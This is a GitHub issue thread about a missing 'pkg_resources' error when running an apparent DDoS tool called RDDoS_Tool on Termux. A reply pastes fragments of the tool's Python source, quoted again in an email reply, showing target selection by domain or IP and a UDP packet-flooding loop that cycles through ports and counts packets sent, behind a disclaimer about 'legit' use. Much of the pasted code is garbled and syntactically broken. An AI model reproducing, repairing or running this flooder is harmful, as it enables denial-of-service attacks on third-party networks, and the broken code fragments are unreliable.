-
Notifications
You must be signed in to change notification settings - Fork 46
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Traceback (most recent call last): File "/data/data/com.termux/files/home/RDDoS_Tool/RDDoS_Tool.py", line 15, in <module> import pyfiglet File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/pyfiglet/__init__.py", line 8, in <module> import pkg_resources ModuleNotFoundError: No module named 'pkg_resources' #14
Comments
Termux use this command |
Input.opt = str(input("\n> ")) Selection.if opt == '1': elif opt == '2': elif opt == '3':
elif opt == '4': else:
else:
except:
except:
elif port == 1900: try: |
Thanks
…On Mon, Dec 2, 2024, 11:04 AM kming2011 ***@***.***> wrote:
Input.
opt = str(input("\n> "))
Selection.
if opt == '1':
domain = str(input("Domain:"))
ip = socket.gethostbyname(domain)
break
elif opt == '2':
ip = str(input("IP Address: "))
break
elif opt == '3':
print("\n\033[101mEasy. .سهل\033[0m \033[101m \033[0m \033[101m \033[0m
\033[101m \033[0m \033[0m \033[92m_____\033[0m")
print(" \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m
\033[0m \033[101m \033[0m\033[0m \033[92m.-' '-.\033[0m")
print("\033[101mOpen. .افتح\033[0m \033[101m \033[0m \033[101m \033[0m
\033[101m \033[0m \033[101m \033[0m \033[92m.'\033[91m____\033[0m
secure\033[92m'.\033[0m")
print(" \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m
\033[0m \033[101m \033[0m \033[92m/ \033[91m| _ \\033[0m \033[93m__\033[0m
\033[92m\\033[0m")
print("\033[101mSecure. .يؤمن\033[0m \033[101m \033[0m \033[101m \033[0m
\033[101m \033[0m \033[101m \033[0m \033[92m;\033[0m r \033[91m| |
*) /\033[0m\033[93m/ o\\033[0m t \033[92m;\033[0m") print("
\033[92m|\033[0m e \033[91m| _ <\033[0m \033[93m\__/\033[0m e
\033[92m|\033[0m") print("RedDDoS Tool is an open source tool for
\033[92m;\033[0m d \033[91m|*| \ \\033[0m \033[93m<|\033[0m a
\033[92m;\033[0m")
print("penetration. You can test networks/servers/any \033[92m\
\033[91m\/\033[0m \033[93m<|\033[0m m\033[92m/\033[0m")
print("other devices with it. \033[92m'.\033[0m member \033[93m<|\033[0m
\033[92m.'\033[0m")
print(" \033[92m'-._____.-'\033[0m")
print("Author of the program is not responsible for")
print("it's usage, everybody MUST use it ONLY in member-id:
'rst-00000002'")
print("legit cases.")
print("\nFor more information visit project's site.")
goon = input("\n\n\n\n\n\n\nPress Enter to continue.")
os.system(cmd_clear)
elif opt == '4':
exit()
else:
print('\033[91mInvaild Choice!\033[0m')
time.sleep(2)
os.system(cmd_clear)
if (port_bool == "y") or (port_bool == "Y"):
port_mode = True
port = int(input("Port: "))
break
else (port_bool == "n") or (port_bool == "N"):
break
else:
print('\033[91mInvaild Choice!\033[0m')
time.sleep(2)
elif port == 1900:
port = 1901
sock.sendto(bytes, (ip, port))
sent += 1
port += 1
print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))
except:
print('\n\033[31;1mExited\033[0m')
elif port == 1900:
port = 1901
sock.sendto(bytes, (ip, port))
sent += 1
port += 1
print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))
except:
print('\n\033[31;1mExited\033[0m')
elif port == 65534:
port = 2
elif port == 1900:
port = 1901
try:
while True:
sock.sendto(bytes, (ip, port))
sent += 1
print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))
except:
print('\n\033[31;1mExited\033[0m')
—
Reply to this email directly, view it on GitHub
<#14 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/BIGAIHVLONOAHPNFJW2LAWT2DPWOPAVCNFSM6AAAAABOM2RHJ6VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDKMJQGYYTQOBYGQ>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
Traceback (most recent call last): File "/data/data/com.termux/files/home/RDDoS_Tool/RDDoS_Tool.py", line 15, in import pyfiglet File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/pyfiglet/init.py", line 8, in
import pkg_resources
ModuleNotFoundError: No module named 'pkg_resources'
Please help me
The text was updated successfully, but these errors were encountered: